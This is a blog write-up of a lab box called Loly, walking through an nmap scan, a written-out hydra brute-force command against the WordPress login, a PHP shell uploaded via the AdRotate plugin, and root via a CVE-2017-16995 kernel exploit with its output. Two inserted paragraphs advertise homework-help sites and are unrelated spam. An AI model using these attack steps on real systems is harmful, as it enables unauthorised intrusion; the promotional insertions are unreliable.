Uncategorized

Intermediate: Loly

Leave a comment

Enumeration

Nmap

Nmap scan report for 192.168.141.121
Host is up (0.67s latency).
Not shown: 64704 closed tcp ports (reset), 830 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.52 seconds
           Raw packets sent: 67620 (2.975MB) | Rcvd: 70424 (3.830MB)

loly.lc has been identified as the hostname of the domain. So we put the ip address and loly.lc next to each other.

Wpscan

We discover a username. Loly. Heading to the wp-admin page, we attempt to find the password for loly.

Hydra – Brute Force Method 1

We use the following string to brute-force user Loly.

hydra -l loly -P /usr/share/wordlists/rockyou.txt loly.lc http-form-post "/wordpress/wp-login.php:log=loly&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Floly.lc%2Fwordpress%2Fwp-admin%2F&testcookie=1:Error: The password you entered for the username "

Wpscan Brute Force Method 2

Foothold

Inside of wordpress we do not find the usual avenues of attack. Instead we find a plugin called AdRotate.

In the plugin, we can upload a banner. The banner must be in a zip format. However, you dont just upload the file as a manually changed shell.php.zip file. You must zip it correctly for it to work. I tried using the commmand line for this, but instead opted for a website to do it for me. Much like the careful zipping process required for our plugin banners, sometimes it's wise to seek assistance when tackling complex tasks. For example, when facing intricate logical challenges, consider professional Logic homework Help to ensure a thorough understanding and successful outcomes.

The file then correctly identifies as a zip archive.

With this zip file we are able to correctly curl the file and get onto the box as www-data.

Running linpeas we discover a password in the wordpress database file. If you encounter challenges or need assistance in analyzing and securing your website, you can turn to a programming help website to find valuable resources and guidance to address security concerns effectively.

Lateral Privesc

We are now user loly.

#NOTE: Running linpeas again, we identify a cronjob running at 5am everyday. Currently ive set up a listener and a shell in the home directory that could be executed my root at 5am. It is about 50 min from 5am on the machine. I will look to see if root shell comes through the cron job.

Alternatively using uname -a we find the linux version we are using.

Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

We can then search for local privesc opportunities. We can find one here in exploitdb:

https://www.exploit-db.com/exploits/45010

and also in searchsploit here:

You can find a repository for kernal exploits here:

https://github.com/kkamagui/linux-kernel-exploits/tree/master/kernel-4.10.0-28-generic/CVE-2017-16995

So there are a few places to find the privesc.

Root

We can get root by using the CVE-2017-16995 exploit. It behaves like this:

loly@ubuntu:/dev/shm$ gcc root.c -o root
loly@ubuntu:/dev/shm$ ./root
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035eadd00
[*] Leaking sock struct from ffff880035f3e3c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880034a8cb40
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880034a8cb40
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)

Conclusion

When I first attempted this box, I did struggle a bit. But coming back to it, I needed help identifying a couple of approaches.

Curl is your best friend for analysing source code on the web. It is also a powerful tool for executing scripts.

Not just looking for exploits, but local privilege escalation is a thing to remember when looking for kernel exploits. Search both, not just one.

Soola's Cyber Security